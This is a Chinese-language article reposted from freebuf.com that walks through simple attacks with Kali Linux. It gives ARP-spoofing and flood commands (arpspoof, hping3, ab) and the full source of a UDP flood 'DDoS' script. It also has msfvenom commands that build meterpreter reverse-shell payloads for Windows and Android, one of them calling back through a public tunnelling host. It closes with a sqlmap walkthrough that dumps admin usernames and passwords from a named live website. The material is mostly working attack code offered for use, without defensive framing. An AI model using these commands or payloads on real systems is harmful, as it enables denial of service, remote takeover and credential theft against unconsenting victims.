利用Kali Linux进行一些简单攻击
2021-04-04 14:52:07 Author: www.freebuf.com(查看原文) 阅读量:91 收藏

arpspoof -i eth0 -t+IPV4+网关

要确认IP转发功能的状态,可以查看/proc文件系统,
使用下面命令: cat /proc/sys/net/ipv4/ip_forward
如果上述文件中的值为0,说明禁止进行IP转发;
如果是1,则说明IP转发功能已经打开。
要想打开IP转发功能,
可以直接修改上述文件: echo 1 > /proc/sys/net/ipv4/ip_forward
把文件的内容由0修改为1。禁用IP转发则把1改为0。

hping3 -S -P -U --flood -V --rand-source +IP


cd DDos-Attack
python ddos-attack.py
IP
端口:80

ab -n 10000000 -c 600 + 网站(端口,目录)

ddos-attack.py脚本如下

import sys
import os
import time
import socket
import random
#Code Time
from datetime import datetime
now = datetime.now()
hour = now.hour
minute = now.minute
day = now.day
month = now.month
year = now.year

##############
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
bytes = random._urandom(1490)
#############

os.system("clear")
os.system("figlet DDos Attack")
print
print "Author   : HA-MRX"
print "You Tube : https://www.you-tube.com/c/HA-MRX"
print "github   : https://github.com/Ha3MrX"
print "Facebook : https://www.facebook.com/muhamad.jabar222"
print
ip = raw_input("IP Target : ")
port = input("Port       : ")

os.system("clear")
os.system("figlet Attack Starting")
print "[                    ] 0% "
time.sleep(5)
print "[=====               ] 25%"
time.sleep(5)
print "[==========          ] 50%"
time.sleep(5)
print "[===============     ] 75%"
time.sleep(5)
print "[====================] 100%"
time.sleep(3)
sent = 0
while True:
     sock.sendto(bytes, (ip,port))
     sent = sent + 1
     port = port + 1
     print "Sent %s packet to %s throught port:%s"%(sent,ip,port)
     if port == 65534:
       port = 1


外网:(具体教程搜索一下Sunny-Ngrok内网穿透)
./sunny clientid 你的id

64位(外):
msfvenom -p windows/x64/meterpreter/reverse_tcp -e x64/shikata_ga_nai -i 12 -b ‘\x00’ lhost=vipgz5.idcfengye.com lport=10016 -f exe -o haya.exe

64位(内):
msfvenom -p windows/x64/meterpreter/reverse_tcp -e x64/shikata_ga_nai -i 12 -b ‘\x00’ lhost=192.168.0.101 lport=1234 -f exe -o /root/haya.exe

32位:
msfvenom -p windows/x64/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b ‘\x00’ lhost=192.168.0.101 lport=1234 -f exe -o /root/haya.exe

android:
msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.0.101 lport=1234 R > root/test.apk

msfconsole

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_tcp

set lhost 192.168.0.101

set lport 1234

exploit

第一步:检测注入 sqlmap -u http://tunesoman.com/product.php?id=200
在这里插入图片描述

一直回车即可,最后可检测出版本

在这里插入图片描述

第二步:检测该IP有哪些数据库 sqlmap -u http://www.tunesoman.com/product.php?id=200 --dbs

在这里插入图片描述

此时显示出所有的数据库
在这里插入图片描述

第三步:检测出数据库之后,开始获取它里面的表 (batch的意思是不用一直yes,直接运行到底)

在这里插入图片描述

这时就检测出来了
在这里插入图片描述

第四步:我们来检测一下admin_user表里有哪些字段。(–column列出字段 ,-T后面+表名,-D后面+数据库名)

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

第五步:这时我们就可以查出这些字段内有什么数据(-C查看字段,–dump是把所有的记录列出来)

sqlmap -u http://www.tunesoman.com/product.php?id=200 -C admin_user_name,admin_user_pass -T admin_user -D db363851433 --batch --dump

此时我们就获取到了所有的数据了,里面包含用户名和密码,这时我们就可以进去它的服务器了

在这里插入图片描述
最后:输入用户名和密码,进入服务器。


文章来源: https://www.freebuf.com/articles/web/268498.html
如有侵权请联系:admin#unsafe.sh